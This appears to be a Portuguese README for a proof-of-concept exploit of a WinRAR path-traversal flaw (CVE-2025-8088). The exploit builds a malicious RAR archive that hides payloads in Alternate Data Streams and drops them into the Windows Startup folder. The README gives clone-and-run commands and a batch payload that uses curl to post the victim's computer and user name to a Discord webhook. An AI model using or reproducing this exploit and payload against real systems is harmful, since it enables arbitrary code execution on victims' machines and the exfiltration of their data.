
Exploração de CVE no Winrar anterior à versão 7.13 usando múltiplos fluxos ADS em um único arquivo (Implementação de PDF personalizada)
Um exploit de prova de conceito para a vulnerabilidade do WinRAR (CVE-2025-8088) que afeta as versões 7.12 e anteriores. Esta ferramenta cria um arquivo RAR malicioso que incorpora payloads em Alternate Data Streams (ADS) com path traversal, potencialmente levando à execução arbitrária de código.
# Clone o repositório
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088
# Instale as dependências
pip install reportlab
# Execute o exploit
python CVE-2025-8088.py
Edite o payload para chamar um webhook do Discord:
# Substitua a variável PAYLOAD no script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extraído em %COMPUTERNAME% por %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
Substitua YOUR_DISCORD_WEBHOOK_URL pela URL real do seu webhook.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\